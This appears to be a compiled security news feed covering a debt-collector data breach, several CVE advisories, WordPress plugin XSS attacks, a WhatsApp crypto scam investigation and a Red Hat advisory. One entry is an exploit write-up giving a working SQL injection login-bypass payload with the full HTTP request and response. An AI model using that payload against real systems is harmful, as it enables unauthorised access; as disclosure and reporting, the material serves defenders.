Financial Business and Consumer Solutions has filed a notification of a data breach which affects over 3 million US citizens.

The US debt collection agency Financial Business and Consumer Solutions (FBCS) has filed a data breach notification, listing the the total number of people affected as 3,226,631.

FBCS is a nationally licensed, third-party collection agency that collects commercial and consumer debts, with most of its activity involving the recovery of consumer debts on behalf of creditors. According to the official statement provided by FBCS, the exposed data includes:

*   Full names
*   Social security numbers
*   Birth dates
*   Account information
*   Drivers license or other state ID numbers

In some cases, it also includes medical claims information, provider information, and clinical information (including diagnosis/conditions, medications, and other treatment information), and/or health insurance information.

FBCS has sent data breach notifications to those affected, detailing what data was compromised and offering 12 months of free credit monitoring.

**Protecting yourself after a data breach**

There are some actions you can take if you are, or suspect you may have been, the victim of a data breach.

*   **Check the vendor’s advice.** Every breach is different, so check with the vendor to find out what’s happened, and follow any specific advice they offer.
*   **Change your password.** You can make a stolen password useless to thieves by changing it. Choose a strong password that you don’t use for anything else. Better yet, let a password manager choose one for you.
*   **Enable two-factor authentication (2FA).** If you can, use a FIDO2-compliant hardware key, laptop or phone as your second factor. Some forms of two-factor authentication (2FA) can be phished just as easily as a password. 2FA that relies on a FIDO2 device can’t be phished.
*   **Watch out for fake vendors.** The thieves may contact you posing as the vendor. Check the vendor website to see if they are contacting victims, and verify the identity of anyone who contacts you using a different communication channel.
*   **Take your time.** Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.
*   **Consider not storing your card details**. It’s definitely more convenient to get sites to remember your card details for you, but we highly recommend not storing that information on websites.
*   **Set up identity monitoring.** Identity monitoring alerts you if your personal information is found being traded illegally online, and helps you recover after.

**Scan for your exposed personal data**

You can check what personal information of yours has been exposed online with our Digital Footprint portal. Just enter your email address (it’s best to submit the one you most frequently use) to our free Digital Footprint scan and we’ll give you a report.

**We don’t just report on threats – we help safeguard your entire digital identit**y

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

 Debt collection agency FBCS leaks information of 3 million US citizens 

When a drug kingpin named Microsoft tried to seize control of an encrypted phone company for criminals, he was playing right into its real owners’ hands.

Inside the Biggest FBI Sting Operation in History

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday added a security flaw impacting the Oracle WebLogic Server to the Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation.
Tracked as CVE-2017-3506 (CVSS score: 7.4), the issue concerns an operating system (OS) command injection vulnerability that could be exploited to obtain unauthorized

Oracle WebLogic Server OS Command Injection Flaw Under Active Attack

A Reflected Cross-site scripting (XSS) vulnerability located in htdocs/compta/paiement/card.php of Dolibarr before 19.0.2 allows remote attackers to inject arbitrary web script or HTML via a crafted payload injected into the facid parameter.

**Reflected Cross-Site Scripting (XSS) in Dolibarr**

Moderate severity GitHub Reviewed Published Jun 3, 2024 to the GitHub Advisory Database • Updated Jun 4, 2024

GHSA-hv2j-6654-x74q: Reflected Cross-Site Scripting (XSS) in Dolibarr

Failing to sanitize content from unauthenticated  website visitors, the form component is susceptible to Cross-Site Scripting.

**TYPO3 Cross-Site Scripting (XSS) in form component**

Moderate severity GitHub Reviewed Published Jun 3, 2024 to the GitHub Advisory Database • Updated Jun 3, 2024

GHSA-5j86-5xvg-7q93: TYPO3 Cross-Site Scripting (XSS) in form component

**Why is this Chrome CVE included in the Security Update Guide?**

The vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable.

**How can I see the version of the browser?**

1.  In your Microsoft Edge browser, click on the 3 dots (...) on the very right-hand side of the window
2.  Click on **Help and Feedback**
3.  Click on **About Microsoft Edge**

CVE-2024-5493: Chromium: CVE-2024-5493 Heap buffer overflow in WebRTC

Fastly researchers discover unauthenticated stored XSS attacks plaguing WordPress Plugins including WP Meta SEO, and the popular WP…

Fastly researchers discover unauthenticated stored XSS attacks plaguing WordPress Plugins including WP Meta SEO, and the popular WP Statistics and LiteSpeed! Learn how these attacks work, the impact they have, and how to fortify your site with a multi-layered defence.

WordPress, the globally used content management system (CMS) powering millions of websites, is being abused in attacks exploiting unauthenticated stored Cross-Site Scripting (XSS) vulnerabilities, warns cloud security provider Fastly. The company discovered active exploitation attempts targeting three high-severity vulnerabilities in popular WordPress plugins.

According to Fastly’s blog post, attackers are injecting malicious scripts and backdoors into websites to create new admin accounts, inject PHP backdoors in plugin and theme files, and set up tracking scripts to monitor infected targets. The malicious payloads were referenced in five domains and with two additional tracking-based domains previously associated with WordPress plugin exploitation.

Vulnerable plugins include WP Meta SEO, and the popular WP Statistics and LiteSpeed Cache plugins, boasting over 600,000 and 5 million active installations respectively, were found vulnerable to attacks, with malicious payloads injected via URL search parameters and scripts disguised as admin notifications, potentially leading to widespread compromise.

For your information, Unauthenticated Stored XSS is a malicious script, which when injected on a WordPress site allows unauthorized access to sensitive information like cookies and session tokens. 

****Vulnerability Details****

CVE-2023-6961, discovered by CERT PL researcher Krzysztof Zając in April 2024, exposes a vulnerability in the WP Meta SEO plugin, which can be exploited by attackers by sending a payload to a target site, generating a 404 response, and inserting an unsanitized header into the database. 

CVE-2024-2194, discovered by Tim Coen in March 2024, allows unauthenticated attackers to inject web scripts into the WP Statistics plugin versions 14.5 and earlier when a user accesses the injected page. Versions lower than 14.5 remain active on 48% of all websites using the plugin.

CVE-2023-40000, discovered by Patchstack in February 2024, exposes a stored cross-site scripting vulnerability in the LiteSpeed Cache plugin, triggering an XSS vulnerability when an admin accesses a backend page disguised as an admin notification.

WordPress plugins rely on user-generated content, which can be vulnerable to malicious scripts if not properly validated and sanitized. Any exploitation can lead to severe consequences, including session hijacking, data theft, malware distribution, and website defacement.

To safeguard your WordPress site from unauthenticated stored XSS attacks update your core, plugins and themes regularly, prioritize input validation and sanitization, regularly scan your site for vulnerabilities, implement a Web Application Firewall (WAF), and use strong passwords and Multi-Factor Authentication (MFA).

Adam Neel, Threat Detection Engineer at Critical Start commented on the issue and told Hackread.com, _“_These WordPress vulnerabilities allow attackers to steal admin credentials via cross-site scripting (XSS) and WordPress admins have capabilities that you would not want in the hands of an attacker such as removing other users, deleting pages, and being able to see all backend content,_“_ he warned.

_“_This is a wealth of information and power for attackers to have, so website administrators must update the vulnerable plugins. Ensure all WordPress plugins are updated to the latest versions, particularly WP Statistics, WP Meta SEO, and LiteSpeed Cache_,”_ Adam advised.

1.  5 Best CAPTCHA Plugins for WordPress Websites
2.  WordPress Websites Hacked with New Sign1 Malware
3.  WordPress Websites Being Hacked with Balada Malware
4.  FakeUpdates Malware Targets Millions of WordPress Sites
5.  Zero-Day Exploit Threatens 200,000 WordPress Websites

Popular WordPress Plugins Leave Millions Open to Backdoor Attacks

Employee and Visitor Gate Pass Logging System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    # Exploit Title: Employee and Visitor Gate Pass Logging System - SQLi Authentication Bypass# Date: 29.05.2024# Exploit Author: Furkan Eren Tetik# Vendor Homepage: https://www.sourcecodester.com/php/15026/employee-and-visitor-gate-pass-logging-system-php-source-code.html# Software Link: https://www.sourcecodester.com/download-code?nid=15026&title=Employee+and+Visitor+Gate+Pass+Logging+System+in+PHP+with+Source+Code# Version: 1.0# Tested on: Windows 11, Kali Linux# Employee and Visitor Gate Pass Logging System v1.0 Login page can be bypassed with a simple SQLi to the username parameter.Steps To Reproduce:1 - Go to the login page http://localhost/employee_gatepass/admin/login.php2 - Enter the payload to username field as "admin' or '1'='1" without double-quotes and type anything to password field.3 - Click on "Login" button and you are logged in as administrator.PoCRequestPOST /employee_gatepass/classes/Login.php?f=login HTTP/1.1Host: localhostContent-Length: 43sec-ch-ua: "Chromium";v="111", "Not(A:Brand";v="8"Accept: */*Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.65 Safari/537.36sec-ch-ua-platform: "Windows"Origin: http://localhostSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://localhost/employee_gatepass/admin/login.phpAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=9f8v4097jovtf6a3igi4l6479iConnection: closeusername=admin'+or+'1'%3D'1&password=furkan--------------------------------------------------------------------------------------------------------------------------------responseHTTP/1.1 200 OKDate: Wed, 29 May 2024 17:01:26 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30X-Powered-By: PHP/8.0.30Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheAccess-Control-Allow-Origin: *Content-Length: 20Connection: closeContent-Type: text/html; charset=UTF-8{"status":"success"}

Employee And Visitor Gate Pass Logging System 1.0 SQL Injection

A scammer tried to seduce us by offering the credentials to an account that held roughly half a million dollars.

This weekend a scammer tried his luck by reaching out to me on WhatsApp. It’s not that I don’t appreciate it, but trust me, it’s bad for your business.

I received one message from a number hailing from the Togolese Republic.

WhatsApp message from an unknow sender

> “Jay, your financial account has been added. Account Csy926. Password \[\*\*\*\*\*\*\*\*\] USDT Balance 1,660,086.50 EUR: 592,030.92 \[domain\] Keep it in a safe place.”

I asked them to send the message in English, pretending not to understand Dutch, but received no reply.

But since it was a rainy day and I’d never seen this type of WhatApp scam before, I decided to investigate.

Sometimes it takes some effort, especially when the domain is blocked for fraud by your favorite security software, but nothing was going to stop me now from looking for my new-found wealth.

Malwarebytes blocked the domain for fraud

To fully understand the message, it’s good to know that USTD stands for Tether, a cryptocurrency referred to as a stablecoin because its value is pegged to a flat currency. In the case of USTD the flat currency is the US dollar. The link makes a stablecoin’s value less volatile than that of other cryptocurrencies, which is attractive for traders that like to switch quickly between cryptocurrencies and flat currencies.

So, I visited the domain which, no surprise there, turned out to be a fake trading platform. I tried the login credentials which were so kindly provided to me.

Welcome to login

Once logged in I checked my wallet and lo and behold, I’m rich! (Or “Jay” is.)

Nice wallet

The wallet belongs to Csy926 who has VIP5 access and contains 1658670.31 USDT or $602,494.07.

I can either recharge, withdraw, or transfer my USDT tokens or transfer the cold hard cash in dollars. Knowing that in this type of scam the victim always has to invest a—relatively–small amount to get the bait, I knew what to expect.

The easiest way would have been if I could transfer the dollars to a bank account, so I tried that first.

Transfer form

Sadly, there were obstacles:

*   Transfers can only be done to other accounts on the platform and the recipient needs to be at least a VIP1 level.
*   Only VIP members can transfer without a key. Assuming Jay is the one with the key, it’s a good thing that the account has a VIP5 status.

So, to be a recipient of a US$ amount, I’ll need a VIP1 level account on the same platform.

Sadly, that’s not me. So I decided to see what I can do with the USDT tokens.

Withdraw form

The form shows a security tip warning users to fill in their withdrawal account accurately, as assets can’t be returned after transferring them out. That sucks for Jay.

But all in all, that looks promising, but again there are some problems.

*   I’ll need a TRC20 wallet. A TRC20 wallet app is an application, accessible on mobile/web or desktop devices, designed specifically for storing, managing, and engaging with TRC20 tokens.
*   Once I filled out the form and clicked on Withdraw, it turned out I needed a key.

Please enter KEY

Looks like it’s time to read the FAQs. Fortunately, this has the answers to all the “right” questions.

What should I do if I forget my KEY?

Long story short. You set the key when you open the account, and it cannot be retrieved. But…..if you have two VIP accounts you can transfer funds from the old account to your new account. And there is no need for a KEY if you have a VIP account. Considering Jay has a VIP5 account there lies an opportunity.

How to activate VIP?

And here comes the catch all of our regular readers saw coming by now, VIP accounts that are able to receive funds cost money. The cheapest—VIP1—requires a deposit of 50 USDT (roughly $50) which is not refundable and can’t be canceled. But with a VIP1 account I can only receive $30 per month and it’s only valid for 2 months. So, that’s not a big help when you are as rich as I am, sorry, Jay is.

VIP1 account is the lowest level and the cheapest

It would take me until the next ice age—4600 years—to transfer the entire amount at that rate, with the off chance that the rightful owner would drain the account or change the password as soon as they noticed the leak.

Any unsuspecting victim that has come this far and is willing to steal from the treasure dropped in their lap, now realizes that before they can enjoy all that money, they first:

1.  Need to open a new account.
2.  Make a deposit to turn it into a VIP account. The amount depends on their greed and impatience because the higher the VIP level, the larger the amount you can transfer in one day and per month.
3.  Transfer the funds from Jay’s account to their own account.
4.  Set up a TRC20 account.
5.  Withdraw the money from the new account to their TRC20 wallet.

We decided not to sponsor the scammers, so this is as far as we were willing to go, but we have a distinct feeling that along the steps we outlined there might be other fees and deposits needed.

**Don’t fall for scammers**

*   Any unsolicited WhatsApp message from an unknown person is suspect. No matter how harmless or friendly it may seem. Most pig butchering scams start with what seems a misdirected message.
*   Don’t follow links that reach you in any unexpected way, and certainly not from an untrusted source.
*   If it’s too good to be true, then it’s very likely not true.
*   Scammers bank on the fact that the more time and money you have invested, the more determined you will become to get to the desired end result.
*   Use a web filtering app to shield you from known malicious websites. Preferably Malwarebytes Premium or Malwarebytes Browser Guard.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

 WhatsApp cryptocurrency scam goes for the cash prize 

Red Hat Security Advisory 2024-3349-03 - Red Hat OpenShift Container Platform release 4.12.58 is now available with updates to packages and images that fix several bugs and add enhancements.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_3349.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: OpenShift Container Platform 4.12.58 security update  
Advisory ID:        RHSA-2024:3349-03  
Product:            Red Hat OpenShift Enterprise  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:3349  
Issue date:         2024-06-02  
Revision:           03  
CVE Names:          CVE-2024-28180  
====================================================================

Summary: 

Red Hat OpenShift Container Platform release 4.12.58 is now available with updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container Platform 4.12.

Red Hat Product Security has rated this update as having a security impact of  Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.

This advisory contains the container images for Red Hat OpenShift Container Platform 4.12.58. See the following advisory for the RPM packages for this release:

https://access.redhat.com/errata/RHSA-2024:3351

Space precludes documenting all of the container images in this advisory. See the following Release Notes documentation, which will be updated shortly for this release, for details about these changes:

https://docs.openshift.com/container-platform/4.12/release_notes/ocp-4-12-release-notes.html

Security Fix(es):

* jose-go: improper handling of highly compressed data (CVE-2024-28180)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.  
All OpenShift Container Platform 4.12 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift CLI (oc) or web console. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.12/updating/updating-cluster-cli.html

Solution:

https://quay.io/repository/openshift-release-dev/ocp-release?tab=tags.

https://docs.openshift.com/container-platform/4.12/updating/updating-cluster-cli.html

https://docs.openshift.com/container-platform/4.12/release_notes/ocp-4-12-release-notes.html

CVEs:

CVE-2024-28180

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2268854  
https://issues.redhat.com/browse/OCPBUGS-33175  
https://issues.redhat.com/browse/OCPBUGS-33198  
https://issues.redhat.com/browse/OCPBUGS-33386  
https://issues.redhat.com/browse/OCPBUGS-33422  
https://issues.redhat.com/browse/OCPBUGS-33517  
https://issues.redhat.com/browse/OCPBUGS-33778

Tag

#web